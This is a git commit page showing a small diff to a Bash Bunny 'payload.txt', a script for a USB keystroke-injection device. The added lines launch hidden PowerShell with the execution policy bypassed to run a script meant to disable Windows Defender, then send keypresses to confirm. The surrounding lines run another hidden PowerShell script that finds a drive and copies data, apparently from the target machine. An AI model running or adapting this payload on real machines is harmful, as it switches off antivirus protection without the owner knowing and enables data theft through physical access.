Update payload.txt

pull/301/head
C1PH3R 2017-12-11 21:00:55 +01:00 committed by GitHub
parent a287f4c9b9
commit 14d9fcd9ae
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 6 additions and 1 deletions

View File

@ -7,6 +7,11 @@ ATTACKMODE HID STORAGE
GET SWITCH_POSITION
#Wait for the computer to recognise the drive etc
QUACK delay 5000
#Disable AntiVirus (Windows Defender)
RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\disable-anti-virus.ps1')"
Q DELAY 1000
Q LEFT
Q ENTER
#Get drive letter and copying it:
RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\GetDrive.ps1')"
Q DELAY 1000